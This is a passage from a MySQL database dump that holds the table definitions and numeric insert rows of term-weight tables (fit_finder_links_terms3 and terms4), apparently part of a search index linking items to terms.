128,51409,0.98),(128,51410,1.12),(128,51452,0.28),(128,51453,1.02669),(128,51454,1.09669),(128,51455,1.09669),(128,51456,1.16669),(128,51457,0.95669),(128,51458,1.26),(128,51459,2.05338),(128,51460,2.24),(128,51461,0.93331),(128,51462,1.07331),(128,51463,1.02669),(128,51464,1.14331),(128,51465,1.07331),(128,51466,1.14331),(128,51467,0.98),(128,51468,1.07331),(128,51469,1.00331),(128,51470,1.12),(128,51471,1.14331),(128,51472,1.02669),(128,51473,1.09669),(128,51474,1.09669),(128,51475,1.14331),(128,51476,1.16669),(128,51477,0.56),(128,51478,0.84),(128,51479,0.91),(128,51480,0.84),(128,51481,1.07331),(128,51482,0.86331),(128,51483,0.93331),(128,51484,0.88669),(128,51485,1.05),(128,51486,0.93331),(128,51487,1.12),(128,51488,0.91),(128,51489,1.05),(128,51490,1.00331),(134,52644,0.88669),(134,52645,1.02669),(134,52670,0.98),(134,52671,1.05),(134,52672,0.98),(134,52673,1.21331),(134,52674,0.91),(134,52675,1.00331); /*!40000 ALTER TABLE `fit_finder_links_terms2` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms3` -- DROP TABLE IF EXISTS `fit_finder_links_terms3`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms3` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms3` -- LOCK TABLES `fit_finder_links_terms3` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms3` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms3` VALUES (128,497,1.44),(9,497,4.04),(9,498,1.82),(9,499,0.95669),(9,500,1.02669),(9,501,0.98),(9,502,1.09669),(9,503,0.95669),(9,504,1.12),(105,505,0.18669),(120,505,0.18669),(125,505,0.18669),(9,505,0.37338),(104,505,0.37338),(116,505,0.37338),(119,505,0.37338),(112,505,0.56007),(117,505,0.56007),(103,505,0.74676),(126,505,0.74676),(9,506,1.77338),(9,507,1.96),(35,9560,0.56),(107,9560,0.56),(35,9561,0.93331),(35,9562,1.14331),(35,9563,1.05),(35,9564,1.12),(117,10619,0.84),(119,10619,0.84),(52,11684,0.74662),(52,11685,2.14662),(52,11686,1.12),(52,11687,1.4),(58,11688,0.28),(58,11689,0.93331),(58,11690,1.09669),(55,12380,0.28),(55,12381,1.05),(55,12382,1.12),(117,14101,0.14),(112,15664,0.04669),(125,15664,0.04669),(103,16928,0.28),(103,16929,0.98),(103,16930,1.21331),(103,16931,0.18669),(103,16932,0.95669),(103,16933,1.09669),(103,16934,0.18669),(117,16934,0.18669),(125,16934,0.18669),(120,16934,1.30683),(103,16935,0.84),(103,16936,0.91),(103,16937,0.93331),(103,16938,1.07331),(103,16939,0.98),(103,16940,1.09669),(103,16941,1.02669),(103,16942,1.21331),(103,16943,0.91),(103,16944,1.02669),(104,18219,0.23331),(104,18220,0.91),(104,18221,1.02669),(104,18694,0.28),(104,18695,0.93331),(104,18696,1.23669),(120,18697,0.23331),(104,18697,0.46662),(104,18698,0.95669),(104,18699,1.05),(104,18700,1.00331),(104,18701,1.14331),(104,18702,0.37338),(104,18703,0.93331),(104,18704,1.02669),(104,18705,0.91),(104,18706,0.98),(104,18707,1.00331),(104,18708,1.09669),(104,18709,0.91),(104,18710,1.00331),(105,19978,0.23331),(105,19979,0.88669),(105,19980,1.02669),(105,19981,0.18669),(120,19981,0.18669),(112,19981,0.74676),(105,19982,1.00331),(105,19983,1.23669),(118,19984,0.14),(105,19984,0.28),(105,19985,1.02669),(105,19986,1.09669),(105,19987,0.84),(105,19988,0.91),(105,19989,0.18669),(105,19990,1.05),(105,19991,1.14331),(105,19992,0.18669),(110,19992,0.74676),(105,19993,0.86331),(105,19994,1.12),(125,19995,0.18669),(105,19995,0.37338),(105,19996,0.86331),(105,19997,0.98),(105,19998,0.86331),(105,19999,1.02669),(105,20000,0.93331),(105,20001,1.09669),(106,21415,1.30676),(106,21416,1.02669),(106,21417,1.19),(106,21418,0.98),(106,21419,1.05),(106,21420,1.02669),(106,21421,1.19),(106,21422,1.00331),(106,21423,1.16669),(125,21424,0.18669),(106,21424,0.37338),(106,21425,1.82),(106,21426,2.24),(106,21427,0.23331),(106,21428,1.00331),(106,21429,1.21331),(106,21430,0.23331),(106,21431,0.93331),(106,21432,1.00331),(107,22155,0.37331),(107,22156,0.98),(107,22157,1.12),(107,22625,0.93324),(107,22626,4.01324),(107,22627,4.29324),(107,22628,2.14662),(107,22629,2.38),(109,24339,0.65338),(109,24340,2.00662),(109,24341,1.07331),(109,24342,1.14331),(111,24343,0.09331),(109,24343,0.18662),(109,24344,1.86662),(109,24345,1.16669),(109,24346,1.07331),(109,24347,0.28),(109,24348,1.02669),(109,24349,1.12),(110,27076,0.86331),(110,27077,1.09669),(110,27078,0.91),(110,27079,1.12),(110,27080,0.84),(110,27081,1.05),(110,27082,0.88669),(110,27083,1.00331),(110,27084,2.8),(110,27085,1.05),(110,27086,1.16669),(110,27087,1.12),(110,27088,1.23669),(110,27089,1.09669),(110,27090,1.19),(110,27091,1.09669),(110,27092,1.19),(110,27093,1.12),(110,27094,1.26),(111,29580,0.81669),(111,29581,0.88669),(112,32146,0.14),(112,32147,0.91),(112,32148,1.00331),(112,32149,0.32669),(112,32150,0.95669),(112,32151,1.23669),(112,32152,0.18669),(112,32153,0.91),(112,32154,1.09669),(112,32155,0.46669),(112,32156,1.05),(112,32157,1.16669),(112,32158,0.28),(112,32159,0.91),(112,32160,1.07331),(112,32161,0.37331),(112,32162,1.05),(112,32163,1.16669),(112,32828,0.81669),(112,32829,1.00331),(112,32830,0.42),(123,32830,0.42),(112,32831,1.02669),(112,32832,1.14331),(112,32833,0.28),(112,32834,0.95669),(112,32835,1.09669),(112,32836,1.02669),(112,32837,1.19),(112,32838,3.15),(112,32839,1.21331),(112,32840,1.21331),(112,32841,1.14331),(112,32842,0.93331),(112,32843,1.05),(112,32844,0.91),(112,32845,1.02669),(112,32846,0.88669),(112,32847,0.95669),(117,34103,0.32669),(128,34103,0.32669),(113,34103,0.98007),(113,34104,1.91338),(113,34105,2.1),(113,34106,1.05),(113,34107,1.12),(117,36403,0.23331),(116,37313,0.98),(116,37314,1.07331),(116,37315,0.91),(116,37316,0.98),(117,38322,0.95669),(117,38323,1.07331),(117,38324,0.91),(117,38325,1.09669),(117,38326,0.98),(117,38327,1.07331),(117,38328,0.88669),(117,38329,0.95669),(117,38330,0.98),(117,38331,0.98),(117,38332,1.05),(117,38333,0.91),(117,38334,1.07331),(118,39390,0.14),(118,39391,0.84),(118,39392,0.88669),(118,39393,0.18669),(118,39394,0.91),(118,39395,0.95669),(118,39396,0.91),(118,39397,1.12),(119,39792,0.18669),(119,39793,0.95669),(119,39794,1.02669),(119,39795,0.18669),(119,39796,0.91),(119,39797,0.98),(119,39798,0.28),(119,39799,0.93331),(119,39800,1.05),(119,40452,0.74676),(119,40453,0.84),(119,40454,0.93331),(119,40455,0.88669),(119,40456,0.93331),(119,40457,0.93331),(119,40458,1.07331),(119,40459,0.91),(119,40460,0.98),(119,40461,0.42),(119,40462,1.07331),(119,40463,1.14331),(119,40464,0.32669),(128,40464,0.32669),(123,40464,1.96014),(119,40465,1.00331),(119,40466,1.12),(119,40467,0.23331),(119,40468,1.07331),(119,40469,1.14331),(119,40470,0.93331),(119,40471,0.98),(119,40472,1.05),(119,40473,0.65338),(119,40474,0.98),(119,40475,1.07331),(119,40476,0.98),(119,40477,1.19),(120,41078,0.09331),(120,41079,0.81669),(120,41080,0.93331),(120,42062,0.98),(120,42063,1.19),(120,42064,0.86331),(120,42065,1.00331),(120,42066,0.91),(120,42067,1.05),(120,42068,0.95669),(120,42069,1.12),(120,42070,0.91),(120,42071,1.02669),(120,42072,1.00331),(120,42073,1.07331),(120,42074,0.88669),(120,42075,1.00331),(120,42076,0.88669),(120,42077,1.07331),(120,42078,1.00331),(120,42079,1.07331),(120,42080,0.23331),(120,42081,0.86331),(120,42082,0.98),(120,42083,0.95669),(120,42084,1.07331),(123,44929,1.07331),(123,44930,1.16669),(123,44931,1.07331),(123,44932,1.21331),(123,44933,1.05),(123,44934,1.12),(123,44935,0.93331),(123,44936,1.09669),(123,44937,0.93331),(123,44938,1.16669),(123,44939,1.02669),(123,44940,1.16669),(123,44941,1.02669),(123,44942,1.16669),(123,44943,0.42),(123,44944,0.98),(123,44945,1.07331),(123,44946,0.09331),(123,44947,0.98),(123,44948,1.12),(125,47782,0.81669),(125,47783,1.02669),(125,47784,1.00331),(125,47785,1.05),(125,47786,0.88669),(125,47787,1.07331),(125,47788,0.23331),(125,47789,1.02669),(125,47790,1.19),(125,47791,0.28),(125,47792,0.93331),(125,47793,1.05),(125,47794,1.00331),(125,47795,1.09669),(125,47796,0.98),(125,47797,1.14331),(126,48759,0.28),(126,48760,0.93331),(126,48761,1.00331),(126,48762,0.32669),(126,48763,0.91),(126,48764,1.02669),(126,48765,0.84),(126,48766,0.95669),(126,48767,1.12),(126,48768,0.95669),(126,48769,1.16669),(126,48770,1.02669),(126,48771,1.16669),(126,48772,0.86331),(126,48773,1.00331),(126,48774,0.95669),(126,48775,1.07331),(126,48776,0.95669),(126,48777,1.05),(126,48778,0.91),(126,48779,1.00331),(128,51441,0.98),(128,51442,1.30669),(128,51443,0.32669),(128,51444,0.93331),(128,51445,0.98),(128,51446,1.12); /*!40000 ALTER TABLE `fit_finder_links_terms3` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms4` -- DROP TABLE IF EXISTS `fit_finder_links_terms4`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms4` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms4` -- LOCK TABLES `fit_finder_links_terms4` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms4` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms4` VALUES (103,24,0.07),(2,24,0.17),(104,24,0.2),(2,25,1.35343),(2,26,2.26661),(2,27,2.55),(110,28,0.32669),(2,28,0.56004),(3,84,0.51331),(3,85,1.05),(3,86,1.16669),(3,87,1.02662),(3,88,1.02669),(3,89,1.14331),(3,90,1.21331),(3,91,1.33),(3,92,0.42),(3,93,1.16669),(3,94,1.26),(3,246,0.32669),(3,247,1.00331),(3,248,1.12),(3,249,0.28),(3,250,1.00331),(3,251,1.21331),(5,378,0.28),(5,379,1.02669),(5,380,1.23669),(5,381,0.14),(5,382,0.93331),(5,383,1.21331),(5,413,0.32669),(5,414,1.02669),(5,415,1.19),(5,416,0.28),(5,417,0.93331),(5,418,1.09669),(9,460,0.14),(104,460,0.14),(105,460,0.14),(120,460,0.14),(123,460,0.14),(133,460,0.14),(110,460,0.28),(113,460,0.28),(117,460,0.42),(68,460,0.56),(116,460,0.56),(103,460,1.54),(9,461,0.88669),(9,462,0.95669),(9,463,0.7),(9,464,1.14331),(9,465,1.26),(105,596,0.0175),(106,596,0.0175),(111,596,0.0175),(120,596,0.0175),(123,596,0.0175),(126,596,0.0175),(134,596,0.0175),(104,596,0.035),(112,596,0.035),(125,596,0.035),(116,596,0.0525),(118,596,0.0525),(9,596,0.0875),(110,596,0.0875),(113,596,0.0875),(119,596,0.105),(107,596,0.1925),(117,596,0.3675),(103,596,0.385),(9,597,0.86331),(119,597,0.86331),(103,597,1.72662),(9,598,1.07331),(9,599,0.86331),(110,599,0.86331),(113,599,0.86331),(103,599,4.31655),(9,600,0.98),(9,601,0.88669),(107,601,0.88669),(110,601,0.88669),(119,601,0.88669),(123,601,0.88669),(9,602,0.93331),(123,602,0.93331),(103,603,0.88669),(116,603,0.88669),(9,603,1.77338),(9,604,1.91338),(9,605,0.02331),(107,605,0.02331),(118,605,0.02331),(119,605,0.04662),(123,605,0.06993),(110,605,0.11655),(113,605,0.11655),(117,605,0.11655),(116,605,0.16317),(103,605,0.20979),(9,606,0.91),(9,607,1.02669),(9,608,0.37331),(111,608,0.37331),(112,608,0.37331),(113,608,0.37331),(114,608,0.37331),(117,608,0.37331),(9,609,0.95669),(113,609,0.95669),(9,610,1.00331),(134,1569,0.65338),(35,1569,0.98007),(35,1570,1.00331),(21,3033,0.34),(21,3034,1.7334),(24,3051,0.34),(24,3057,0.64008),(25,3058,0.34),(25,3064,0.5334),(110,3075,0.28),(130,3075,1.48),(117,9330,0.18669),(123,9330,0.18669),(35,9330,0.37338),(35,9331,0.86331),(35,9332,0.95669),(35,9333,0.88669),(35,9334,0.95669),(35,9335,0.28),(35,9336,0.93331),(35,9337,1.00331),(35,9338,0.28),(103,9338,0.28),(110,9338,0.28),(117,9338,0.28),(120,9338,0.28),(35,9339,0.91),(110,9339,0.91),(35,9340,1.16669),(35,9341,1.07331),(35,9342,1.02669),(35,9343,1.14331),(35,9344,0.98),(35,9345,1.21331),(35,9346,0.32669),(35,9347,0.98),(35,9348,1.07331),(35,9349,0.46669),(35,9350,1.00331),(35,9351,1.21331),(35,9352,0.18669),(58,9352,0.18669),(103,9352,0.18669),(112,9352,0.18669),(35,9353,1.02669),(35,9354,1.23669),(35,9355,0.51331),(35,9356,1.05),(35,9357,1.30669),(35,9358,0.32669),(103,9358,0.32669),(107,9358,0.32669),(123,9358,0.32669),(35,9359,1.00331),(35,9360,1.07331),(133,9735,0.28),(35,9735,0.84),(35,9736,0.93331),(35,9737,1.02669),(35,9738,0.93331),(35,9739,1.26),(35,9740,0.91),(35,9741,1.19),(35,9742,0.74662),(35,9743,1.09669),(35,9744,1.26),(35,9745,1.02669),(35,9746,1.26),(35,9747,0.56),(35,9748,1.16669),(35,9749,1.35331),(35,9750,0.37331),(125,9750,0.37331),(134,9750,0.37331),(35,9751,1.02669),(35,9752,1.28331),(35,9753,0.37338),(35,9754,2.1),(35,9755,1.19),(35,9756,1.14331),(110,10570,0.42),(103,10582,0.18669),(110,10582,0.18669),(117,10582,0.18669),(118,10582,0.18669),(107,10582,0.37338),(111,10582,0.37338),(118,10583,0.86331),(128,10677,0.42),(110,10677,1.26),(103,10783,0.23331),(119,10783,0.23331),(123,10783,0.23331),(125,10783,0.23331),(126,10783,0.23331),(112,10783,0.69993),(120,10783,0.69993),(40,10811,0.32669),(40,10812,1.05),(40,10813,1.21331),(40,10814,0.51331),(116,10814,0.51331),(40,10815,1.05),(40,10816,0.42),(110,10816,0.84),(120,10816,0.84),(40,10817,1.00331),(120,10817,1.00331),(40,10818,1.14331),(40,10819,0.37331),(113,10819,0.37331),(133,10819,0.37331),(40,10820,1.07331),(40,10821,1.23669),(40,10887,0.37331),(113,10887,0.37331),(40,10888,0.98),(113,10888,0.98),(40,10889,1.07331),(105,11463,0.32669),(117,11463,0.32669),(118,11463,0.32669),(123,11463,0.32669),(128,11463,0.32669),(133,11463,0.32669),(107,11463,0.65338),(110,11463,0.98007),(120,11463,1.63345),(52,11602,0.18669),(68,11602,0.18669),(110,11602,0.18669),(125,11602,0.18669),(133,11602,0.18669),(52,11603,0.91),(68,11603,0.91),(133,11603,0.91),(52,11716,0.04669),(55,11716,0.04669),(58,11716,0.04669),(68,11716,0.04669),(110,11716,0.09338),(58,11733,0.98),(58,11796,0.28),(58,11797,0.98),(58,12046,0.18669),(117,12046,0.18669),(126,12046,0.18669),(58,12047,0.95669),(58,12049,0.28),(112,12049,0.28),(68,12049,1.12),(52,12158,0.84),(52,12159,0.95669),(52,12160,0.56),(52,12161,1.12),(52,12162,1.21331),(52,12163,0.37331),(52,12164,0.98),(52,12165,1.28331),(52,12237,1.07331),(52,12238,0.32669),(58,12238,0.32669),(52,12239,0.91),(52,12240,1.05),(55,12403,0.84),(55,12404,1.14331),(55,12405,0.28),(55,12406,0.95669),(55,12407,1.14331),(55,12408,0.60669),(55,12409,1.16669),(55,12410,1.21331),(55,12460,0.23331),(68,12460,0.23331),(134,12460,0.23331),(55,12461,0.88669),(68,12461,0.88669),(134,12461,0.88669),(55,12462,1.07331),(58,12584,0.84),(58,12585,1.02669),(58,12586,1.21331),(58,12587,1.09669),(58,12588,1.14331),(58,12589,1.26),(58,12640,0.32669),(103,12640,0.32669),(58,12641,1.00331),(58,12642,1.19),(58,12643,1.21331),(58,12644,0.91),(58,12645,1.14331),(103,12852,0.28),(112,12855,0.32669),(120,12855,0.32669),(68,13462,0.81669),(68,13463,0.93331),(117,13464,0.84),(68,13464,1.68),(103,13464,1.68),(116,13464,1.68),(68,13465,2.14662),(68,13466,0.98),(68,13467,1.19),(68,13468,0.88669),(68,13469,0.98),(68,13470,0.95669),(68,13471,1.26),(68,13472,0.91),(68,13473,1.05),(68,13474,0.91),(68,13475,1.02669),(68,13476,0.91),(68,13477,0.98),(68,13478,0.32669),(112,13478,0.32669),(126,13478,0.32669),(68,13479,1.07331),(68,13480,1.12),(68,13481,0.23331),(113,13481,0.23331),(103,13481,0.46662),(68,13482,0.88669),(68,13483,0.98),(68,13484,0.23331),(126,13484,0.23331),(68,13485,0.91),(68,13604,1.07331),(68,13605,1.05),(110,13606,0.32669),(123,13606,0.32669),(68,13606,0.65338),(68,13607,1.91338),(68,13608,2.05338),(105,13762,0.46669),(110,13762,0.46669),(113,13762,0.93338),(109,13762,1.13339),(110,13955,0.42),(110,13960,0.32669),(120,13960,0.32669),(125,13960,0.32669),(106,13960,0.98007),(110,14213,0.51331),(110,14219,0.51331),(110,14220,1.05),(111,14222,0.28),(114,14222,0.28),(126,14222,0.28),(111,14223,0.91),(114,14223,0.91),(120,14225,0.32669),(125,14444,0.42),(126,14444,0.42),(133,14444,1.68),(113,14642,0.51331),(133,14642,0.51331),(105,15588,0.32669),(119,15591,0.32669),(110,15740,0.04669),(109,15813,0.04669),(114,15813,0.04669),(117,15813,0.04669),(110,15813,0.09338),(103,15890,0.86331),(103,15891,0.93331),(103,16291,0.88669),(113,16291,0.88669),(103,16292,0.98),(103,16293,0.95669),(103,16294,1.09669),(103,16295,0.91),(103,16296,1.02669),(103,16297,0.93331),(103,16298,0.98),(103,16299,0.86331),(103,16300,0.95669),(103,16301,0.88669),(103,16302,1.00331),(103,16303,0.88669),(103,16304,0.95669),(103,16305,0.86331),(103,16306,0.93331),(103,16307,0.91),(103,16308,1.00331),(103,16309,0.93331),(103,16310,1.05),(103,16311,0.28),(107,16311,0.28),(119,16311,0.28),(126,16311,0.28),(118,16311,0.56),(103,16312,0.91),(103,16313,1.00331),(103,16314,0.51331),(103,16315,1.05),(103,16316,1.21331),(103,16317,0.37331),(113,16317,0.37331),(103,16318,0.98),(103,16319,1.07331),(103,16320,0.28),(112,16320,0.28),(120,16320,0.84),(103,16321,0.95669),(103,16322,1.07331),(103,16323,0.32669),(103,16324,0.93331),(103,16325,1.07331),(103,16326,0.32669),(110,16326,0.32669),(117,16326,0.32669),(103,16327,1.12),(103,16328,1.33),(103,16329,0.93331),(103,16330,1.02669),(103,16331,0.93331),(103,16332,0.98),(103,16333,0.37331),(112,16333,0.37331),(103,16334,0.98),(103,16335,1.07331),(103,16336,0.23331),(103,16337,0.95669),(103,16338,1.09669),(103,16339,0.32669),(103,16340,0.93331),(103,16341,0.98),(103,16342,0.93331),(103,16343,1.07331),(103,16344,0.37331),(103,16345,0.95669),(103,16346,1.05),(103,16347,0.28),(103,16348,1.05),(103,16349,1.14331),(103,16350,0.42),(103,16351,1.14331),(103,16352,1.23669),(103,16353,0.28),(121,16353,0.28),(125,16353,0.28),(120,16353,0.56),(103,16354,0.98),(103,16355,0.23331),(134,16355,0.23331),(103,16356,0.91),(103,16357,0.98),(103,16358,0.18669),(112,16358,0.18669),(119,16358,0.18669),(117,16358,0.37338),(113,16358,0.56007),(103,16359,0.86331),(117,16359,0.86331),(103,16360,1.12),(103,16361,0.23331),(113,16361,0.23331),(116,16361,0.23331),(125,16361,0.23331),(120,16361,0.93324),(103,16362,0.91),(103,16363,1.14331),(103,16364,0.28),(103,16365,0.93331),(103,16366,1.02669),(103,16367,0.32669),(103,16368,1.00331),(103,16369,1.07331),(103,16370,0.46669),(103,16371,1.07331),(103,16372,1.23669),(120,16373,0.37331),(128,16373,0.37331),(103,16373,0.74662),(110,16373,1.49324),(103,16374,0.95669),(103,16375,1.14331),(103,16376,1.09669),(103,16377,1.14331),(103,16378,0.84),(103,16379,1.00331),(103,16380,1.12),(103,16381,1.00331),(103,16382,1.30669),(103,16383,0.18669),(103,16384,0.93331),(103,16385,1.09669),(103,16386,0.86331),(103,16387,1.07331),(103,16388,0.91),(103,16389,1.00331),(103,16390,0.32669),(103,16391,0.93331),(103,16392,1.02669),(103,16393,0.46669),(103,16394,1.12),(103,16395,1.23669),(103,16396,0.32669),(103,16397,0.93331),(103,16398,1.09669),(103,16399,0.32669),(103,16400,1.07331),(103,16401,1.28331),(103,16402,0.28),(103,16403,0.88669),(103,16404,1.14331),(103,16405,0.32669),(111,16405,0.32669),(117,16405,0.65338),(103,16406,1.00331),(103,16407,1.21331),(103,16408,1.07331),(103,16409,1.16669),(103,16410,0.32669),(103,16411,0.93331),(103,16412,1.02669),(103,17447,0.56),(103,17448,0.98),(103,17449,1.02669),(103,17450,1.00331),(103,17451,1.14331),(103,17452,0.28),(120,17452,0.28),(103,17453,0.95669),(103,17454,1.00331),(103,17455,0.18669),(103,17456,0.88669),(103,17457,1.00331),(103,17458,0.28),(103,17459,1.07331),(103,17460,1.16669),(103,17461,0.32669),(107,17461,0.65338),(103,17462,1.02669),(103,17463,1.09669),(103,17464,0.28),(118,17464,0.28),(120,17464,0.28),(107,17464,0.56),(112,17464,0.56),(103,17465,0.91),(103,17466,1.09669),(103,17467,0.32669),(103,17468,0.93331),(103,17469,1.05),(103,17470,0.37331),(103,17471,0.93331),(103,17472,1.05),(103,17473,1.16669),(103,17474,1.26),(103,17475,0.46669),(110,17475,0.46669),(103,17476,1.00331),(103,17477,1.09669),(103,17478,0.32669),(103,17479,1.02669),(103,17480,1.14331),(103,17481,0.95669),(103,17482,1.09669),(103,17483,0.28),(103,17484,0.91),(103,17485,1.07331),(110,17486,0.23331),(117,17486,0.23331),(119,17486,0.23331),(103,17486,0.46662),(103,17487,0.91),(103,17488,1.00331),(103,17489,0.91),(103,17490,1.00331),(103,17491,0.23331),(104,17491,0.46662),(103,17492,1.00331),(103,17493,1.09669),(103,17494,0.14),(109,17494,0.14),(120,17494,0.14),(103,17495,0.81669),(103,17496,1.02669),(103,18147,0.88669),(103,18148,1.05),(103,18149,0.0175),(105,18149,0.0175),(118,18149,0.0175),(120,18149,0.0175),(103,18150,0.91),(103,18151,1.02669),(103,18152,0.18669),(104,18152,0.18669),(118,18152,0.18669),(103,18153,0.93331),(103,18154,1.02669),(103,18155,0.93331),(103,18156,1.07331),(103,18157,0.84),(103,18158,0.95669),(103,18159,0.93331),(103,18160,1.12),(103,18161,0.86331),(103,18162,0.93331),(103,18163,0.98),(103,18164,0.98),(103,18165,0.98),(103,18166,0.95669),(103,18167,1.02669),(103,18168,0.95669),(103,18169,1.02669),(103,18170,0.88669),(103,18171,0.98),(103,18172,0.88669),(103,18173,0.95669),(103,18174,0.86331),(113,18174,0.86331),(103,18175,0.98),(103,18176,0.91),(103,18177,1.02669),(103,18178,0.88669),(103,18179,0.95669),(103,18180,0.86331),(107,18180,1.72662),(103,18181,0.98),(103,18182,0.93331),(104,18182,0.93331),(107,18182,0.93331),(103,18183,1.00331),(103,18184,0.95669),(116,18184,0.95669),(103,18185,1.77338),(103,18186,0.95669),(103,18187,0.95669),(103,18188,0.91),(107,18188,2.73),(103,18189,1.00331),(103,18190,0.23331),(103,18191,0.93331),(103,18192,1.00331),(103,18193,0.28),(103,18194,0.95669),(103,18195,1.07331),(103,18196,0.93331),(103,18197,1.00331),(103,18198,1.68),(103,18199,1.91338),(103,18200,0.91),(103,18201,1.00331),(103,18202,1.96),(103,18203,1.16669),(103,18204,1.07331),(103,18205,1.00331),(103,18206,1.19),(103,18207,1.77338),(103,18208,1.07331),(103,18209,1.02669),(104,18407,0.28),(119,18407,0.28),(104,18408,0.91),(104,18409,1.07331),(104,18410,0.88669),(104,18411,1.02669),(104,18412,0.65338),(104,18413,1.12),(104,18414,1.23669),(104,18415,1.02669),(104,18416,1.14331),(104,18417,0.32669),(117,18417,0.98007),(104,18418,1.07331),(104,18419,1.30669),(104,18420,0.23331),(104,18421,0.91),(104,18422,0.95669),(104,18423,0.32669),(104,18424,0.93331),(104,18425,1.00331),(104,18426,0.23331),(104,18427,0.88669),(104,18428,1.12),(104,18429,0.09331),(105,18429,0.09331),(112,18429,0.09331),(117,18429,0.09331),(123,18429,0.18662),(120,18429,0.37324),(104,18430,0.81669),(105,18430,0.81669),(117,18430,0.81669),(104,18431,0.98),(104,18432,0.51331),(105,18432,0.51331),(104,18433,1.07331),(104,18434,1.26),(104,18435,0.46669),(110,18435,0.46669),(104,18436,0.98),(104,18437,1.16669),(104,18438,0.37331),(110,18438,0.37331),(113,18438,0.37331),(104,18439,1.00331),(104,18440,1.12),(104,18441,0.46669),(104,18442,1.09669),(104,18443,1.37669),(104,18444,0.28),(104,18445,1.02669),(104,18446,1.14331),(104,18447,0.32669),(104,18448,0.91),(104,18449,1.16669),(104,18450,0.56007),(104,18451,0.98),(104,18452,1.05),(104,18453,0.91),(104,18454,0.98),(104,18455,0.91),(104,18456,0.98),(104,18457,0.14),(105,18457,0.14),(104,18458,0.93331),(104,18459,1.05),(104,18945,0.28),(104,18946,0.95669),(104,18947,1.07331),(106,18948,0.23331),(110,18948,0.23331),(112,18948,0.23331),(104,18948,0.46662),(109,18948,0.46662),(111,18948,0.46662),(120,18948,0.46662),(105,18948,0.93324),(121,18948,0.93324),(117,18948,1.16655),(114,18948,1.63317),(128,18948,12.832),(113,18948,23.5643),(106,18949,0.98),(110,18949,0.98),(112,18949,0.98),(104,18949,1.96),(109,18949,1.96),(111,18949,1.96),(120,18949,1.96),(105,18949,2.94),(121,18949,3.92),(117,18949,4.9),(114,18949,6.86),(128,18949,53.9),(113,18949,98.98),(104,18950,1.14331),(106,18950,1.14331),(109,18950,1.14331),(120,18950,1.14331),(114,18950,2.28662),(117,18950,2.28662),(104,18951,1.12),(104,18952,0.37331),(104,18953,1.00331),(104,18954,1.16669),(104,18955,0.28),(125,18955,0.28),(104,18956,0.98),(104,18957,1.12),(104,18958,0.23331),(104,18959,0.91),(104,18960,1.09669),(104,18961,0.32669),(104,18962,1.00331),(104,18963,1.12),(104,18964,0.28),(104,18965,0.91),(104,18966,0.98),(104,18967,0.37331),(104,18968,1.12),(104,18969,1.23669),(104,18970,0.18669),(110,18970,0.18669),(126,18970,0.18669),(104,18971,0.86331),(104,18972,1.07331),(104,18973,0.37331),(110,18973,0.74662),(104,18974,1.02669),(104,18975,1.14331),(104,18976,0.32669),(104,18977,0.93331),(104,18978,0.98),(104,18979,0.14),(104,18980,0.88669),(104,18981,0.95669),(104,18982,0.09331),(104,18983,0.14),(121,18983,0.14),(104,18984,1.00331),(104,18985,1.09669),(104,18986,0.88669),(104,18987,0.98),(104,18988,0.95669),(104,18989,1.02669),(104,18990,0.18669),(104,18991,0.86331),(104,18992,1.07331),(104,19307,0.18669),(105,19307,0.18669),(117,19307,0.18669),(104,19308,0.86331),(105,19308,0.86331),(117,19308,0.86331),(104,19309,0.93331),(105,19309,0.93331),(117,19309,0.93331),(125,19310,0.18669),(112,19310,0.37338),(104,19310,0.56007),(106,19310,0.56007),(110,19310,0.56007),(119,19310,0.56007),(120,19310,0.74676),(104,19311,0.93331),(104,19312,1.05),(104,19313,0.88669),(119,19313,0.88669),(120,19313,0.88669),(104,19314,1.09669),(104,19315,0.95669),(104,19316,1.02669),(104,19317,0.95669),(104,19318,1.07331),(104,19319,1.05),(104,19320,0.84),(107,19320,0.84),(134,19320,0.84),(104,19321,0.98),(104,19322,0.28),(116,19322,0.28),(104,19323,0.95669),(104,19324,1.05),(105,19607,0.86331),(105,19608,0.91),(105,19609,0.23331),(112,19609,0.23331),(120,19609,0.23331),(105,19610,1.00331),(105,19611,1.09669),(105,19612,0.42),(105,19613,1.05),(105,19614,1.14331),(105,19615,0.37331),(105,19616,1.09669),(105,19617,1.19),(105,19618,0.46669),(105,19619,1.12),(105,19620,1.28331),(105,19621,0.28),(105,19622,0.91),(105,19623,1.07331),(105,19624,0.28),(105,19625,1.07331),(105,19626,1.23669),(105,19627,0.37338),(123,19627,0.37338),(105,19628,1.00331),(105,19629,1.07331),(105,19630,0.98),(105,19631,1.09669),(105,19632,0.23331),(113,19632,0.93324),(105,19633,0.91),(105,19634,1.16669),(105,19635,0.32669),(105,19636,0.95669),(105,19637,1.02669),(105,19638,0.93324),(105,19639,0.98),(105,19640,1.09669),(105,19641,1.09669),(105,19642,1.35331),(105,19643,0.95669),(105,19644,1.14331),(105,19645,0.95669),(105,19646,1.07331),(105,19647,0.88669),(105,19648,0.37331),(105,19649,0.93331),(105,19650,1.05),(105,19651,0.46669),(105,19652,1.05),(105,19653,1.23669),(105,19654,0.28),(105,19655,1.02669),(105,19656,1.12),(120,19657,0.28),(123,19657,0.28),(105,19657,0.56),(105,19658,0.95669),(120,19658,0.95669),(105,19659,1.07331),(105,19660,1.02669),(105,